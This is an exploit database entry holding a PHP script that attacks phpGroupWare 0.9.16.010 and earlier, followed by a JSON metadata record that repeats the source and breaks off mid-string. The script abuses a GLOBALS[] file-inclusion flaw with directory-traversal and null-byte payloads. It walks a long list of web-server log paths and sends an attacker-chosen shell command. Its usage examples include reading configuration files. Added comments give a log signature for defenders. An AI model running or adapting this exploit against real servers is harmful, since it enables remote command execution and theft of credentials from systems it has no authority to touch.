ID 1337DAY-ID-756 Type zdt Reporter Kacper Modified 2006-08-29T00:00:00
Description
Exploit for unknown platform in category web applications
==================================================================
phpGroupWare <= 0.9.16.010 GLOBALS[] Remote Code Execution Exploit
==================================================================
#!/usr/bin/php -q -d short_open_tag=on
<?
/*
this works against register_globals=On
and magic quotes = off :)
*/
/*
vulnerable code => calendar/inc/class.holidaycalc.inc.php line 14-33:
....
/* $Id: class.holidaycalc.inc.php,v 1.5 2001/08/26 12:32:28 skeeter Exp $ */
if (empty($GLOBALS['phpgw_info']['user']['preferences']['common']['country']))
{
$rule = 'US';
}
else
{
$rule = $GLOBALS['phpgw_info']['user']['preferences']['common']['country'];
}
$calc_include = PHPGW_INCLUDE_ROOT.'/calendar/inc/class.holidaycalc_'.$rule.'.inc.php';
if(@file_exists($calc_include))
{
include($calc_include);
}
else
{
include(PHPGW_INCLUDE_ROOT.'/calendar/inc/class.holidaycalc_US.inc.php');
}
....
ex:
http://www.site.com/[phpGroupWare_path]/calendar/inc/class.holidaycalc.inc.php?GLOBALS[phpgw_info][user][preferences][common][country]=../../../../../../../../../etc/passwd%00
*/
# Banner: cosmetic console output only. No socket is opened and no file is
# touched before the argument check that follows this block.
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~";
echo "+\r\n";
echo "- - - [DEVIL TEAM THE BEST POLISH TEAM] - -\r\n\r\n";
echo "+\r\n";
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\"\r\n";
echo "+\r\n\r\n";
echo "- phpGroupWare <= 0.9.16.010 GLOBALS[] Remote Code Execution Exploit"\r\n";
echo "+"\r\n";
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"\r\n";
echo "+"\r\n";
echo "- [Script name: phpGroupWare v. 0.9.16.010"\r\n";
echo "- [Script site: http://sourceforge.net/projects/phpgroupware/"\r\n";
echo "+"\r\n";
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"\r\n";
echo "+"\r\n";
echo "- Find by: Kacper (a.k.a Rahim)"\r\n";
echo "+"\r\n";
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\"\r\n";
echo "+"\r\n";
echo "- Special Greetz: DragonHeart ;-)"\r\n";
echo "- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi, nukedclx, mivus ;]"\r\n";
echo "+"\r\n";
echo "[email protected] Przyjazni nie da sie zamienic na marne korzysci @!"\r\n";
echo "+"\r\n";
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\"\r\n";
echo "+"\r\n";
echo "- Z Dedykacja dla osoby,"\r\n";
echo "- bez ktorej nie mogl bym zyc..."\r\n";
echo "- K.C:* J.M (a.k.a Magaja)"\r\n";
echo "+"\r\n";
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\"\r\n";
# Usage text, then exit, when fewer than three arguments (host, path, cmd)
# are supplied. The help lines still refer to PHPList and "/lists/", which
# do not match the phpGroupWare target this script requests further down.
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd options\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to PHPList\r\n";
echo "cmd: a shell command\r\n";
echo "Options:\r\n";
echo " -p[port]: specify a port other than 80\r\n";
echo " -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /lists/ cat ./config/config.php\r\n";
echo "php ".$argv[0]." localhost /lists/ ls -la -p81\r\n";
echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
die;
}
# Silence every PHP diagnostic (notices from undefined offsets below are
# hidden by this), remove the script execution time limit, and cap each
# socket operation at 5 seconds.
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
/*
 Hex-dump helper; nothing else in this script calls it.
 Returns the hex column, a CRLF, then the printable column. Bytes <= 32 or
 > 126 are rendered as '.', every byte takes two hex digits, and both
 columns get a CRLF after each 15 bytes.
*/
function quick_dump($string)
{
    $hex_col = '';
    $text_col = '';
    $in_row = 0;
    $len = strlen($string);
    for ($pos = 0; $pos < $len; $pos++)
    {
        $byte = ord($string[$pos]);
        # non-printable (including space) becomes a dot
        $text_col .= ($byte <= 32 || $byte > 126) ? " ." : " ".$string[$pos];
        # left-pad single hex digits with a zero
        $hex_col .= " ".str_pad(dechex($byte), 2, "0", STR_PAD_LEFT);
        $in_row++;
        if ($in_row == 15)
        {
            $in_row = 0;
            $text_col .= "\r\n";
            $hex_col .= "\r\n";
        }
    }
    return $hex_col."\r\n".$text_col;
}
# PCRE pattern (parentheses serve as the delimiters) for a proxy given as
# "a.b.c.d:port". Only digit counts are checked, not numeric ranges.
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
/*
 Send one raw HTTP request and leave the whole response in the global $html.
 $packet : complete request text, including the blank line after the headers.
 Reads $proxy, $host, $port and $proxy_regex from global scope; writes $html.
 Terminates the process (die) when the connection fails or when $proxy does
 not match $proxy_regex. Returns nothing.
*/
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
# direct connection: resolve the host name, then connect to $port
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
# proxy form is "ip:port"; the caller is expected to have built an
# absolute URL into $packet for this case
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
# direct: read line by line until the server closes the connection
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
# via proxy: read one byte at a time until EOF *and* a CRLFCRLF (end of
# headers) has been seen. eregi() was removed in PHP 7. If the response
# never contains CRLFCRLF, this loop does not terminate after EOF because
# fread() then returns an empty string forever.
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}
/*
 Build a float seed from microtime(); nothing else in this script calls it.
 Result: whole seconds plus the fractional part scaled by 100000.
*/
function make_seed()
{
    $parts = explode(' ', microtime());
    $fraction = (float) $parts[0];
    $seconds = (float) $parts[1];
    return $seconds + ($fraction * 100000);
}
# Positional arguments: argv[1] is the host, argv[2] the path. Everything
# from argv[3] onward is either an option or part of the command.
$host=$argv[1];
$path=$argv[2];
$cmd="";$port=80;$proxy="";
# Options are recognised by their first two characters ("-p81", "-P1.1.1.1:80");
# any other argument is appended to $cmd. A one-character argument makes
# $argv[$i][1] an undefined offset (hidden by error_reporting(0) above).
# "<>" is PHP's alternative spelling of "!=".
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
$cmd=urlencode($cmd);
# The path must both start and end with '/'.
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
# Through a proxy the request line needs an absolute URL; otherwise the
# bare path is used.
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
# Candidate web-server log locations, written as directory traversals
# relative to the vulnerable include. The request loop below tries them in
# this order.
$paths=array(
"../../../../../../../../../../../../var/log/httpd/access_log",
"../../../../../../../../../../../../var/log/httpd/error_log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../../../../../../apache/logs/error.log",
"../../../../../../apache/logs/access.log",
"../../../../../../../apache/logs/error.log",
"../../../../../../../apache/logs/access.log",
"../../../../../../../../apache/logs/error.log",
"../../../../../../../../apache/logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../../logs/error.log",
"../../../../../../logs/access.log",
"../../../../../../../logs/error.log",
"../../../../../../../logs/access.log",
"../../../../../../../../logs/error.log",
"../../../../../../../../logs/access.log",
"../../../../../../../../../../../../etc/httpd/logs/acces_log",
"../../../../../../../../../../../../etc/httpd/logs/acces.log",
"../../../../../../../../../../../../etc/httpd/logs/error_log",
"../../../../../../../../../../../../etc/httpd/logs/error.log",
"../../../../../../../../../../../../var/www/logs/access_log",
"../../../../../../../../../../../../var/www/logs/access.log",
"../../../../../../../../../../../../usr/local/apache/logs/access_log",
"../../../../../../../../../../../../usr/local/apache/logs/access.log",
"../../../../../../../../../../../../var/log/apache/access_log",
"../../../../../../../../../../../../var/log/apache/access.log",
"../../../../../../../../../../../../var/log/access_log",
"../../../../../../../../../../../../var/www/logs/error_log",
"../../../../../../../../../../../../var/www/logs/error.log",
"../../../../../../../../../../../../usr/local/apache/logs/error_log",
"../../../../../../../../../../../../usr/local/apache/logs/error.log",
"../../../../../../../../../../../../var/log/apache/error_log",
"../../../../../../../../../../../../var/log/apache/error.log",
"../../../../../../../../../../../../var/log/access_log",
"../../../../../../../../../../../../var/log/error_log"
);
# One request per candidate path (the printed label starts at 2, i.e. $i+2).
# Each GET targets calendar/inc/class.holidaycalc.inc.php and overrides the
# country preference through a GLOBALS[...] query parameter holding the
# traversal string plus %00, with the command in the "cmd" parameter and a
# Googlebot User-Agent header. Success is judged solely by the literal
# marker "56789" in the response; the text after it is printed and the
# script exits.
# For defenders: a request to class.holidaycalc.inc.php whose query string
# contains GLOBALS[phpgw_info] together with "../" or "%00" is the
# signature to alert on in web-server logs.
for ($i=0; $i<=count($paths)-1; $i++)
{
$a=$i+2;
echo "[".$a."] PATH: ".$paths[$i]."\r\n";
$packet ="GET ".$p."calendar/inc/class.holidaycalc.inc.php?GLOBALS[phpgw_info][user][preferences][common][country]=".$paths[$i]."%00&cmd=".$cmd." HTTP/1.0\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"56789"))
{
$temp=explode("56789",$html);
echo $temp[1];
echo "\r\nExploit succeeded...\r\n";
die;
}
}
?>
# 0day.today [2018-04-10] #
{"hash": "de4f47f5f1463d1eaeadff9f1f53881925970391b4e4b28b098e51530cd5ba17", "id": "1337DAY-ID-756", "lastseen": "2018-04-10T09:48:46", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "2481b82eee1cd770af695d842a5b9c42", "key": "href"}, {"hash": "ed8fbd75dec171180f55871203de5cfc", "key": "modified"}, {"hash": "ed8fbd75dec171180f55871203de5cfc", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "507e633ae4aac6c606627393ea66a0e6", "key": "reporter"}, {"hash": "7a8c123dd752096ac3e049950ffdf4b1", "key": "sourceData"}, {"hash": "007071951d3dcffc6a6a77e5953a8606", "key": "sourceHref"}, {"hash": "40d8c79591961575af13e87c587731e0", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"vulnersScore": 7.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/756", "description": "Exploit for unknown platform in category web applications", "title": "phpGroupWare <= 0.9.16.010 GLOBALS[] Remote Code Execution Exploit", "history": [{"bulletin": {"hash": "15664d5a65399a5f6e35642541377a809bb0067376802137277b5b9aa6b0fd91", "id": "1337DAY-ID-756", "lastseen": "2016-04-20T02:05:34", "enchantments": {"score": {"value": 4.7, "vector": "AV:N/AC:L/Au:M/C:P/I:N/A:P/", "modified": "2016-04-20T02:05:34"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "ed8fbd75dec171180f55871203de5cfc", "key": "modified"}, {"hash": "ed7a7672aef86d1ecf7c981a9bcc004c", "key": "href"}, {"hash": 
"d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "40d8c79591961575af13e87c587731e0", "key": "title"}, {"hash": "507e633ae4aac6c606627393ea66a0e6", "key": "reporter"}, {"hash": "4380007de4f038d16428c03934763bb2", "key": "sourceData"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "ed8fbd75dec171180f55871203de5cfc", "key": "published"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "f73381f8fb678b2d9bd18409a04322a8", "key": "sourceHref"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/756", "description": "Exploit for unknown platform in category web applications", "viewCount": 0, "title": "phpGroupWare <= 0.9.16.010 GLOBALS[] Remote Code Execution Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "==================================================================\r\nphpGroupWare <= 0.9.16.010 GLOBALS[] Remote Code Execution Exploit\r\n==================================================================\r\n\r\n\r\n#!/usr/bin/php -q -d short_open_tag=on\r\n<?\r\n/*\r\nthis works against register_globals=On\r\nand magic quotes = off :) \r\n*/\r\n/*\r\nvulnerable code => calendar/inc/class.holidaycalc.inc.php line 14-33:\r\n....\r\n /* $Id: class.holidaycalc.inc.php,v 1.5 2001/08/26 12:32:28 skeeter Exp $ */\r\n\r\n\tif (empty($GLOBALS['phpgw_info']['user']['preferences']['common']['country']))\r\n\t{\r\n\t\t$rule = 'US';\r\n\t}\r\n\telse\r\n\t{\r\n\t\t$rule = $GLOBALS['phpgw_info']['user']['preferences']['common']['country'];\r\n\t}\r\n\r\n\t$calc_include = PHPGW_INCLUDE_ROOT.'/calendar/inc/class.holidaycalc_'.$rule.'.inc.php';\r\n\tif(@file_exists($calc_include))\r\n\t{\r\n\t\tinclude($calc_include);\r\n\t}\r\n\telse\r\n\t{\r\n\t\tinclude(PHPGW_INCLUDE_ROOT.'/calendar/inc/class.holidaycalc_US.inc.php');\r\n\t}\r\n....\r\n\r\nex: 
\r\nhttp://www.site.com/[phpGroupWare_path]/calendar/inc/class.holidaycalc.inc.php?GLOBALS[phpgw_info][user][preferences][common][country]=../../../../../../../../../etc/passwd%00\r\n*/\r\n\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\";\r\necho \"+\\r\\n\";\r\necho \"- - - [DEVIL TEAM THE BEST POLISH TEAM] - -\\r\\n\\r\\n\";\r\necho \"+\\r\\n\";\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\\"\\r\\n\";\r\necho \"+\\r\\n\\r\\n\";\r\necho \"- phpGroupWare <= 0.9.16.010 GLOBALS[] Remote Code Execution Exploit\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"- [Script name: phpGroupWare v. 0.9.16.010\"\\r\\n\";\r\necho \"- [Script site: http://sourceforge.net/projects/phpgroupware/\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"- Find by: Kacper (a.k.a Rahim)\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"- Special Greetz: DragonHeart ;-)\"\\r\\n\";\r\necho \"- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi, nukedclx, mivus ;]\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"!@ Przyjazni nie da sie zamienic na marne korzysci @!\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"- Z Dedykacja dla osoby,\"\\r\\n\";\r\necho \"- bez ktorej nie mogl bym zyc...\"\\r\\n\";\r\necho \"- K.C:* J.M (a.k.a Magaja)\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\\"\\r\\n\";\r\nif ($argc<4) {\r\necho \"Usage: php \".$argv[0].\" host path cmd options\\r\\n\";\r\necho \"host: target server (ip/hostname)\\r\\n\";\r\necho \"path: path to PHPList\\r\\n\";\r\necho \"cmd: a shell command\\r\\n\";\r\necho \"Options:\\r\\n\";\r\necho \" -p[port]: specify a port other 
than 80\\r\\n\";\r\necho \" -P[ip:port]: specify a proxy\\r\\n\";\r\necho \"Examples:\\r\\n\";\r\necho \"php \".$argv[0].\" localhost /lists/ cat ./config/config.php\\r\\n\";\r\necho \"php \".$argv[0].\" localhost /lists/ ls -la -p81\\r\\n\";\r\necho \"php \".$argv[0].\" localhost / ls -la -P1.1.1.1:80\\r\\n\";\r\ndie;\r\n}\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",5);\r\nfunction quick_dump($string)\r\n{\r\n $result='';$exa='';$cont=0;\r\n for ($i=0; $i<=strlen($string)-1; $i++)\r\n {\r\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\r\n {$result.=\" .\";}\r\n else\r\n {$result.=\" \".$string[$i];}\r\n if (strlen(dechex(ord($string[$i])))==2)\r\n {$exa.=\" \".dechex(ord($string[$i]));}\r\n else\r\n {$exa.=\" 0\".dechex(ord($string[$i]));}\r\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\r\n }\r\n return $exa.\"\\r\\n\".$result;\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.$host.':'.$port; die;\r\n }\r\n }\r\n else {\r\n\t$c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid proxy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n\t}\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);\r\n #debug\r\n #echo \"\\r\\n\".$html;\r\n}\r\nfunction make_seed()\r\n{\r\n list($usec, $sec) = explode(' 
', microtime());\r\n return (float) $sec + ((float) $usec * 100000);\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$cmd=\"\";$port=80;$proxy=\"\";\r\n\r\nfor ($i=3; $i<=$argc-1; $i++){\r\n$temp=$argv[$i][0].$argv[$i][1];\r\nif (($temp<>\"-p\") and ($temp<>\"-P\"))\r\n{$cmd.=\" \".$argv[$i];}\r\nif ($temp==\"-p\")\r\n{\r\n $port=str_replace(\"-p\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-P\")\r\n{\r\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\r\n}\r\n}\r\n$cmd=urlencode($cmd);\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n\r\n$paths=array(\r\n\"../../../../../../../../../../../../var/log/httpd/access_log\",\r\n\"../../../../../../../../../../../../var/log/httpd/error_log\",\r\n\"../../../apache/logs/error.log\",\r\n\"../../../apache/logs/access.log\",\r\n\"../../../../apache/logs/error.log\",\r\n\"../../../../apache/logs/access.log\",\r\n\"../../../../../apache/logs/error.log\",\r\n\"../../../../../apache/logs/access.log\",\r\n\"../../../../../../apache/logs/error.log\",\r\n\"../../../../../../apache/logs/access.log\",\r\n\"../../../../../../../apache/logs/error.log\",\r\n\"../../../../../../../apache/logs/access.log\",\r\n\"../../../../../../../../apache/logs/error.log\",\r\n\"../../../../../../../../apache/logs/access.log\",\r\n\"../../../logs/error.log\",\r\n\"../../../logs/access.log\",\r\n\"../../../../logs/error.log\",\r\n\"../../../../logs/access.log\",\r\n\"../../../../../logs/error.log\",\r\n\"../../../../../logs/access.log\",\r\n\"../../../../../../logs/error.log\",\r\n\"../../../../../../logs/access.log\",\r\n\"../../../../../../../logs/error.log\",\r\n\"../../../../../../../logs/access.log\",\r\n\"../../../../../../../../logs/error.log\",\r\n\"../../../../../../../../logs/access.log\",\r\n\"../../../../../../../../../../../../etc/httpd/logs/acces_log\",\r\n\"../../../../../../../../../../../../etc/httpd/logs/acces.log\",\r\n\"
../../../../../../../../../../../../etc/httpd/logs/error_log\",\r\n\"../../../../../../../../../../../../etc/httpd/logs/error.log\",\r\n\"../../../../../../../../../../../../var/www/logs/access_log\",\r\n\"../../../../../../../../../../../../var/www/logs/access.log\",\r\n\"../../../../../../../../../../../../usr/local/apache/logs/access_log\",\r\n\"../../../../../../../../../../../../usr/local/apache/logs/access.log\",\r\n\"../../../../../../../../../../../../var/log/apache/access_log\",\r\n\"../../../../../../../../../../../../var/log/apache/access.log\",\r\n\"../../../../../../../../../../../../var/log/access_log\",\r\n\"../../../../../../../../../../../../var/www/logs/error_log\",\r\n\"../../../../../../../../../../../../var/www/logs/error.log\",\r\n\"../../../../../../../../../../../../usr/local/apache/logs/error_log\",\r\n\"../../../../../../../../../../../../usr/local/apache/logs/error.log\",\r\n\"../../../../../../../../../../../../var/log/apache/error_log\",\r\n\"../../../../../../../../../../../../var/log/apache/error.log\",\r\n\"../../../../../../../../../../../../var/log/access_log\",\r\n\"../../../../../../../../../../../../var/log/error_log\"\r\n);\r\nfor ($i=0; $i<=count($paths)-1; $i++)\r\n{\r\n$a=$i+2;\r\necho \"[\".$a.\"] PATH: \".$paths[$i].\"\\r\\n\";\r\n$packet =\"GET \".$p.\"calendar/inc/class.holidaycalc.inc.php?GLOBALS[phpgw_info][user][preferences][common][country]=\".$paths[$i].\"%00&cmd=\".$cmd.\" HTTP/1.0\\r\\n\";\r\n$packet.=\"User-Agent: Googlebot/2.1\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\nsendpacketii($packet);\r\nif (strstr($html,\"56789\"))\r\n{\r\n $temp=explode(\"56789\",$html);\r\n echo $temp[1];\r\n echo \"\\r\\nExploit succeeded...\\r\\n\";\r\n die;\r\n}\r\n}\r\n?>\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "published": "2006-08-29T00:00:00", "references": [], "reporter": "Kacper", "modified": "2006-08-29T00:00:00", "href": 
"http://0day.today/exploit/description/756"}, "lastseen": "2016-04-20T02:05:34", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "==================================================================\r\nphpGroupWare <= 0.9.16.010 GLOBALS[] Remote Code Execution Exploit\r\n==================================================================\r\n\r\n\r\n#!/usr/bin/php -q -d short_open_tag=on\r\n<?\r\n/*\r\nthis works against register_globals=On\r\nand magic quotes = off :) \r\n*/\r\n/*\r\nvulnerable code => calendar/inc/class.holidaycalc.inc.php line 14-33:\r\n....\r\n /* $Id: class.holidaycalc.inc.php,v 1.5 2001/08/26 12:32:28 skeeter Exp $ */\r\n\r\n\tif (empty($GLOBALS['phpgw_info']['user']['preferences']['common']['country']))\r\n\t{\r\n\t\t$rule = 'US';\r\n\t}\r\n\telse\r\n\t{\r\n\t\t$rule = $GLOBALS['phpgw_info']['user']['preferences']['common']['country'];\r\n\t}\r\n\r\n\t$calc_include = PHPGW_INCLUDE_ROOT.'/calendar/inc/class.holidaycalc_'.$rule.'.inc.php';\r\n\tif(@file_exists($calc_include))\r\n\t{\r\n\t\tinclude($calc_include);\r\n\t}\r\n\telse\r\n\t{\r\n\t\tinclude(PHPGW_INCLUDE_ROOT.'/calendar/inc/class.holidaycalc_US.inc.php');\r\n\t}\r\n....\r\n\r\nex: \r\nhttp://www.site.com/[phpGroupWare_path]/calendar/inc/class.holidaycalc.inc.php?GLOBALS[phpgw_info][user][preferences][common][country]=../../../../../../../../../etc/passwd%00\r\n*/\r\n\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\";\r\necho \"+\\r\\n\";\r\necho \"- - - [DEVIL TEAM THE BEST POLISH TEAM] - -\\r\\n\\r\\n\";\r\necho \"+\\r\\n\";\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\\"\\r\\n\";\r\necho \"+\\r\\n\\r\\n\";\r\necho \"- phpGroupWare <= 0.9.16.010 GLOBALS[] Remote Code Execution Exploit\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"- [Script name: phpGroupWare v. 
0.9.16.010\"\\r\\n\";\r\necho \"- [Script site: http://sourceforge.net/projects/phpgroupware/\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"- Find by: Kacper (a.k.a Rahim)\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"- Special Greetz: DragonHeart ;-)\"\\r\\n\";\r\necho \"- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi, nukedclx, mivus ;]\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"[email\u00a0protected] Przyjazni nie da sie zamienic na marne korzysci @!\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"- Z Dedykacja dla osoby,\"\\r\\n\";\r\necho \"- bez ktorej nie mogl bym zyc...\"\\r\\n\";\r\necho \"- K.C:* J.M (a.k.a Magaja)\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\\"\\r\\n\";\r\nif ($argc<4) {\r\necho \"Usage: php \".$argv[0].\" host path cmd options\\r\\n\";\r\necho \"host: target server (ip/hostname)\\r\\n\";\r\necho \"path: path to PHPList\\r\\n\";\r\necho \"cmd: a shell command\\r\\n\";\r\necho \"Options:\\r\\n\";\r\necho \" -p[port]: specify a port other than 80\\r\\n\";\r\necho \" -P[ip:port]: specify a proxy\\r\\n\";\r\necho \"Examples:\\r\\n\";\r\necho \"php \".$argv[0].\" localhost /lists/ cat ./config/config.php\\r\\n\";\r\necho \"php \".$argv[0].\" localhost /lists/ ls -la -p81\\r\\n\";\r\necho \"php \".$argv[0].\" localhost / ls -la -P1.1.1.1:80\\r\\n\";\r\ndie;\r\n}\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",5);\r\nfunction quick_dump($string)\r\n{\r\n $result='';$exa='';$cont=0;\r\n for ($i=0; $i<=strlen($string)-1; $i++)\r\n {\r\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\r\n {$result.=\" .\";}\r\n else\r\n {$result.=\" \".$string[$i];}\r\n if 
